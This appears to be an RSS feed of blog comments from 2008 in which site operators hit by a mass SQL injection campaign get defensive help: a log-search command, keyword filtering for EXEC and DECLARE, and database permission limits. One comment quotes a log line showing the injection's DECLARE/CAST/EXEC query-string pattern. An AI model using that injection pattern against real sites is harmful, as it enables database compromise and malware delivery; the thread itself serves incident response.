<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>
<channel>
	<title>Comments on: Technical Post about new SQL Injection</title>
	<atom:link href="http://www.wetwired.org/2008/08/06/technical-post-about-new-sql-injection/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.wetwired.org/2008/08/06/technical-post-about-new-sql-injection/</link>
	<description>Good times, Noodle salad</description>
	<pubDate>Thu, 04 Dec 2008 22:07:44 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.5</generator>
		<item>
		<title>By: Finley</title>
		<link>http://www.wetwired.org/2008/08/06/technical-post-about-new-sql-injection/#comment-1406</link>
		<dc:creator>Finley</dc:creator>
		<pubDate>Mon, 11 Aug 2008 23:20:44 +0000</pubDate>
		<guid isPermaLink="false">http://www.wetwired.org/?p=1700#comment-1406</guid>
		<description>...

Sorry ladies, he's taken.</description>
		<content:encoded><![CDATA[<p>&#8230;</p>
<p>Sorry ladies, he&#8217;s taken.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: davis</title>
		<link>http://www.wetwired.org/2008/08/06/technical-post-about-new-sql-injection/#comment-1403</link>
		<dc:creator>davis</dc:creator>
		<pubDate>Mon, 11 Aug 2008 22:52:22 +0000</pubDate>
		<guid isPermaLink="false">http://www.wetwired.org/?p=1700#comment-1403</guid>
		<description>Hey Tony,

I'm not sure about your configuration but there are a couple of things you can do.

There are some ISAPI filters that work pretty well, as well as some ISAPI rewrite freeware that works too. The problem is it usually hits a maximum string issue. The DLL won't parse anything after a set limit. 

Are the public sites load balanced? You could use a load balancer rule to parse out a URL with the key words in it and dev null it. (EXEC, DECLARE, etc.)

I did go through more of the code and it is an exploit that uses some Yahoo Instant Messenger exploits and attempts to drop off a backdoor trojan, so it's not good stuff. 

The other alternative would be to disallow select access from the account that the web server uses to connect to SQL to select from syscolumns or sysobjects. 

Can you post any more specifics about your web app?</description>
		<content:encoded><![CDATA[<p>Hey Tony,</p>
<p>I&#8217;m not sure about your configuration but there are a couple of things you can do.</p>
<p>There are some ISAPI filters that work pretty well, as well as some ISAPI rewrite freeware that works too. The problem is it usually hits a maximum string issue. The DLL won&#8217;t parse anything after a set limit. </p>
<p>Are the public sites load balanced? You could use a load balancer rule to parse out a URL with the key words in it and dev null it. (EXEC, DECLARE, etc.)</p>
<p>I did go through more of the code and it is an exploit that uses some Yahoo Instant Messenger exploits and attempts to drop off a backdoor trojan, so it&#8217;s not good stuff. </p>
<p>The other alternative would be to disallow select access from the account that the web server uses to connect to SQL to select from syscolumns or sysobjects. </p>
<p>Can you post any more specifics about your web app?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Tony</title>
		<link>http://www.wetwired.org/2008/08/06/technical-post-about-new-sql-injection/#comment-1366</link>
		<dc:creator>Tony</dc:creator>
		<pubDate>Fri, 08 Aug 2008 19:04:46 +0000</pubDate>
		<guid isPermaLink="false">http://www.wetwired.org/?p=1700#comment-1366</guid>
		<description>Our company has just been hit by this (as many others, I know).  Thank you for this post -- we're able to see which sites are affected (we host about 40).

We keep cleaning things up and while we're in the middle of updating our SQL security (more stringent data typing and validation, CAPTCHA features on our contact forms, et al.) the injection keeps happening.  Other than updating security approaches with our code as much as possible, are there any additional immediate steps that can be taken to ward this particular injection off?  We've been having to restore our databases just about every day for the last 3 or 4 days while trying to get code cleaned up and tighten security and also find more articles on this.  Just thought I'd check.

Thank you!!
- Tony</description>
		<content:encoded><![CDATA[<p>Our company has just been hit by this (as many others, I know).  Thank you for this post &#8212; we&#8217;re able to see which sites are affected (we host about 40).</p>
<p>We keep cleaning things up and while we&#8217;re in the middle of updating our SQL security (more stringent data typing and validation, CAPTCHA features on our contact forms, et al.) the injection keeps happening.  Other than updating security approaches with our code as much as possible, are there any additional immediate steps that can be taken to ward this particular injection off?  We&#8217;ve been having to restore our databases just about every day for the last 3 or 4 days while trying to get code cleaned up and tighten security and also find more articles on this.  Just thought I&#8217;d check.</p>
<p>Thank you!!<br />
- Tony</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: davis</title>
		<link>http://www.wetwired.org/2008/08/06/technical-post-about-new-sql-injection/#comment-1357</link>
		<dc:creator>davis</dc:creator>
		<pubDate>Thu, 07 Aug 2008 16:47:50 +0000</pubDate>
		<guid isPermaLink="false">http://www.wetwired.org/?p=1700#comment-1357</guid>
		<description>To find out which web pages are being hit go to the root of your web logs..

In IIS there should be a site identifier that will help you to locate which site it is. 

From the root of the web logs issue this command:
(this will search today's logs; if it's yesterday's, search that one)

findstr /s /i /n /c:"declare" ex080807.log &#62;&#62; sql_inj_sites_080807.txt

This will check all recursive sub-folders for the word declare.

If you check that text file you probably have something that looks like this:

W3SVC12345678\ex080807.log:99:2008-08-07 12:57:12 W3SVC12345678 MY-WEBSERVER-HOSTNAME 67.42.4.85 GET /index.asp?topic=4;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); 200

I truncated some of the rest of the stuff because it's not important.. EXCEPT for the HTTP return code.

200 is of course OK, which means the web server processed the request. 

So a query string in index.asp located in the following website: W3SVC12345678. 

You can find out which site that is by going into inetmgr and looking in the site identifier field. 

If you are also a little more curious you can find the SQL code that is being injected by translating the hex after the 0x and before the %20AS% into ascii and that will give you the SQL code being used.

Hope that helps.
Davis</description>
		<content:encoded><![CDATA[<p>To find out which web pages are being hit go to the root of your web logs..</p>
<p>In IIS there should be a site identifier that will help you to locate which site it is. </p>
<p>From the root of the web logs issue this command:<br />
(this will search today&#8217;s logs; if it&#8217;s yesterday&#8217;s, search that one)</p>
<p>findstr /s /i /n /c:&#8221;declare&#8221; ex080807.log &gt;&gt; sql_inj_sites_080807.txt</p>
<p>This will check all recursive sub-folders for the word declare.</p>
<p>If you check that text file you probably have something that looks like this:</p>
<p>W3SVC12345678\ex080807.log:99:2008-08-07 12:57:12 W3SVC12345678 MY-WEBSERVER-HOSTNAME 67.42.4.85 GET /index.asp?topic=4;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x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%20AS%20CHAR(4000));EXEC(@S); 200</p>
<p>I truncated some of the rest of the stuff because it&#8217;s not important.. EXCEPT for the HTTP return code.</p>
<p>200 is of course OK, which means the web server processed the request. </p>
<p>So a query string in index.asp located in the following website: W3SVC12345678. </p>
<p>You can find out which site that is by going into inetmgr and looking in the site identifier field. </p>
<p>If you are also a little more curious you can find the SQL code that is being injected by translating the hex after the 0x and before the %20AS% into ascii and that will give you the SQL code being used.</p>
<p>Hope that helps.<br />
Davis</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Tim</title>
		<link>http://www.wetwired.org/2008/08/06/technical-post-about-new-sql-injection/#comment-1356</link>
		<dc:creator>Tim</dc:creator>
		<pubDate>Thu, 07 Aug 2008 16:19:53 +0000</pubDate>
		<guid isPermaLink="false">http://www.wetwired.org/?p=1700#comment-1356</guid>
		<description>I've cleaned up my data a total of 5 times.  Can you show me how I can find out which pages are being hit?  Thanks!</description>
		<content:encoded><![CDATA[<p>I&#8217;ve cleaned up my data a total of 5 times.  Can you show me how I can find out which pages are being hit?  Thanks!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: davis</title>
		<link>http://www.wetwired.org/2008/08/06/technical-post-about-new-sql-injection/#comment-1347</link>
		<dc:creator>davis</dc:creator>
		<pubDate>Thu, 07 Aug 2008 03:10:45 +0000</pubDate>
		<guid isPermaLink="false">http://www.wetwired.org/?p=1700#comment-1347</guid>
		<description>Traditional asp or cold fusion app?

Take a look at this: http://www.codeplex.com/IIS6SQLInjection

If there are too many factors to lock down in the code. If you are still having problems I can show you some IIS log parsers or search values to locate which pages are being hit.

davis</description>
		<content:encoded><![CDATA[<p>Traditional asp or cold fusion app?</p>
<p>Take a look at this: <a href="http://www.codeplex.com/IIS6SQLInjection" rel="nofollow">http://www.codeplex.com/IIS6SQLInjection</a></p>
<p>If there are too many factors to lock down in the code. If you are still having problems I can show you some IIS log parsers or search values to locate which pages are being hit.</p>
<p>davis</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Jeff</title>
		<link>http://www.wetwired.org/2008/08/06/technical-post-about-new-sql-injection/#comment-1346</link>
		<dc:creator>Jeff</dc:creator>
		<pubDate>Thu, 07 Aug 2008 02:58:20 +0000</pubDate>
		<guid isPermaLink="false">http://www.wetwired.org/?p=1700#comment-1346</guid>
		<description>I got hit by this exact same script today.  I thought my code was totally locked down, but they found a way in.  Twice.</description>
		<content:encoded><![CDATA[<p>I got hit by this exact same script today.  I thought my code was totally locked down, but they found a way in.  Twice.</p>
]]></content:encoded>
	</item>
</channel>
</rss>
